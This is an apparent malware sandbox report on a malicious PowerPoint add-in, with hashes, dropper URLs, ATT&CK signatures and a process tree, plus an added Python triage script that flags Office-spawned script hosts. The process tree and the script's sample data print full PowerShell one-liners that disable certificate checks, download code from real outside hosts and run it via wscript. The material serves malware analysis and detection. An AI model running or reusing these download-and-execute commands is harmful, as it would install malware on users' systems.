Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-11-2024 16:05

General

  • Target

    3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam

  • Size

    7KB

  • MD5

    9fb59ca8e5dbe7036ad7bd3e0d64dc46

  • SHA1

    e63989b5046883141c1b5c80ed9dfe12f5146531

  • SHA256

    3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f

  • SHA512

    8ec8ac5cad6a52bc6f11d56f1f276cb187edcdcf90c65cac28b8610549f54b193e957448b5633d0babb06b654c8e35508fb98ed9aaaf37f2ccb06d3600ae4d27

  • SSDEEP

    192:xrXP/xbajZ8EPm/QUN0iIZU0pU3pWBg6HoqBT02:dXP4ruWnK3pWWsLBT7

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pt.textbin.net/download/x7sf6t2dgv

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2260
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\system32\wscript.exe" x.js
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2492
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2136
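
    The process tree above is the whole story of this sample: POWERPNT.EXE launches two PowerShell one-liners, both of which disable TLS certificate validation, one pulls a second-stage URL from textbin, downloads the payload it points to, writes it to %TEMP%\x.js and runs it with wscript.exe, while the other fetches a decoy x.pptx from Google Drive and opens it. The following Python script is an added example and not part of the sandbox report: it reconstructs that tree from the PIDs and command lines shown (copied here as constructed sample data), flags script hosts that descend from an Office process, and pulls out the URLs, dropped file names, the certificate-validation bypass and the execution primitives. The Proc/Finding types, the regular expressions and the Office/script-host lists are this example's own assumptions about a minimal triage model.

    ```python
    """Triage of the POWERPNT -> powershell -> wscript chain from the sandbox process tree.

    Added example, not part of the sandbox report. Command lines are copied from
    the report as constructed sample data; the data types, regexes and the
    parent/child heuristic are this example's own choices.
    """
    import re
    from dataclasses import dataclass, field

    # Office hosts that have no business spawning script interpreters (assumed list).
    OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
    SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

    URL_RE = re.compile(r"""https?://[^\s'")]+""")
    # File names written via "Out-File -FilePath <name>" or "GetTempPath() + '<name>'".
    DROP_RE = re.compile(r"""(?:-FilePath\s+|\+\s*')([\w.-]+\.(?:js|vbs|ps1|exe|dll|pptx?))""", re.I)
    # Certificate validation disabled: every HTTPS download in the same command accepts any cert.
    TLS_BYPASS_RE = re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)
    # Primitives that turn a download into execution.
    EXEC_RE = re.compile(r"\b(wscript\.exe|cscript\.exe|start|Invoke-Expression|iex)\b", re.I)


    @dataclass
    class Proc:
        pid: int
        ppid: int
        image: str      # base name of the executable
        cmdline: str


    @dataclass
    class Finding:
        pid: int
        chain: list                       # image names from the root process down to this one
        urls: list = field(default_factory=list)
        drops: list = field(default_factory=list)
        executes: list = field(default_factory=list)
        tls_bypass: bool = False


    # Constructed sample: PIDs, parents and command lines as shown in the report.
    SAMPLE = [
        Proc(2004, 0, "POWERPNT.EXE",
             r'"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" '
             r'"C:\Users\Admin\AppData\Local\Temp\3863c533a821c836f236edf3d35a278ccf7d00ec1b5087cb662e8aa7ddb7e54f.ppam"'),
        Proc(2260, 2004, "splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
        Proc(2896, 2004, "powershell.exe",
             "powershell.exe -command $UmniN;"
             "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;"
             "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;"
             "$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;"
             "$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;"
             "$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;"
             "Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit"),
        Proc(2492, 2896, "wscript.exe", r'"C:\Windows\system32\wscript.exe" x.js'),
        Proc(2136, 2004, "powershell.exe",
             "powershell.exe -command "
             "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;"
             "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;"
             "$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;"
             "$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', "
             "[System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;"
             "Set-Location $x ;start x.pptx ; exit"),
    ]


    def chain_for(pid, procs):
        """Return lower-cased image names from the root ancestor down to pid."""
        by_pid = {p.pid: p for p in procs}
        names, seen = [], set()
        while pid in by_pid and pid not in seen:   # 'seen' guards against PID reuse loops
            seen.add(pid)
            names.append(by_pid[pid].image.lower())
            pid = by_pid[pid].ppid
        return names[::-1]


    def triage(procs):
        """Flag script hosts descending from an Office process and extract their IOCs."""
        findings = []
        for p in procs:
            if p.image.lower() not in SCRIPT_HOSTS:
                continue
            chain = chain_for(p.pid, procs)
            if not OFFICE_PARENTS.intersection(chain[:-1]):
                continue
            f = Finding(pid=p.pid, chain=chain)
            f.urls = URL_RE.findall(p.cmdline)
            f.drops = DROP_RE.findall(p.cmdline)
            f.executes = [m.lower() for m in EXEC_RE.findall(p.cmdline)]
            f.tls_bypass = TLS_BYPASS_RE.search(p.cmdline) is not None
            findings.append(f)
        return findings


    def iocs(findings):
        """Deduplicated network and file indicators across all findings."""
        urls = sorted({u for f in findings for u in f.urls})
        drops = sorted({d.lower() for f in findings for d in f.drops})
        return {"urls": urls, "drops": drops}


    if __name__ == "__main__":
        found = triage(SAMPLE)
        for f in found:
            print(f"PID {f.pid}: {' -> '.join(f.chain)}")
            print(f"  urls={f.urls} drops={f.drops} exec={f.executes} tls_bypass={f.tls_bypass}")
        print(iocs(found))
    ```

    Run against the sample tree it reports three findings (PIDs 2896, 2492 and 2136), both PowerShell instances with the certificate-validation bypass set, x.js and x.pptx as dropped files, and the two URLs listed under Malware Config. The same parent/child check is what a detection rule for "Office application spawns PowerShell, which spawns wscript.exe" reduces to; the regexes are deliberately narrow to the constructs in this sample and would need widening for other loaders.
    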

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\x.js

      Filesize

      796B

      MD5

      b75621ae1faee608b4ed39e971d709a5

      SHA1

      bcd528eb22d2e7b1d11c9b603df87cec37d23da5

      SHA256

      54ce5e89f7c67db8cef4954d8f041857474882dc6af675b4120833bb8832a3a5

      SHA512

      5ef0841caeae364fee32cdd561c7473c45244009ae6dc73f38eefffdb1e95f7cb6f0531ef5d273ca7dd28f408c40a93a3de3c619dab41a0953ab731167ec0e66

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      92b53c45a04e893646ca8ed5297e40ee

      SHA1

      9bde835d0298bce52cc508fb6d1d6f49748ac550

      SHA256

      f4864e33bbe2b48fa7e696513d3a120b76c6defed8de33764c71c97719d06f70

      SHA512

      bc988a1a07068ae36b7baddb9ed50f7be0c139df0ebcb6775cb24ca6010d1d0a93fd24ef1040aee1e42914f85b55a475e64e94b2e7d61470fd82473c9b2183ec

    • memory/2004-0-0x000000002D4F1000-0x000000002D4F2000-memory.dmp

      Filesize

      4KB

    • memory/2004-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2004-2-0x0000000072C3D000-0x0000000072C48000-memory.dmp

      Filesize

      44KB

    • memory/2004-10-0x0000000005260000-0x0000000005360000-memory.dmp

      Filesize

      1024KB

    • memory/2004-7-0x0000000005260000-0x0000000005360000-memory.dmp

      Filesize

      1024KB

    • memory/2004-21-0x0000000072C3D000-0x0000000072C48000-memory.dmp

      Filesize

      44KB

    • memory/2004-22-0x0000000005260000-0x0000000005360000-memory.dmp

      Filesize

      1024KB

    • memory/2136-20-0x00000000064F0000-0x0000000006FAA000-memory.dmp

      Filesize

      10.7MB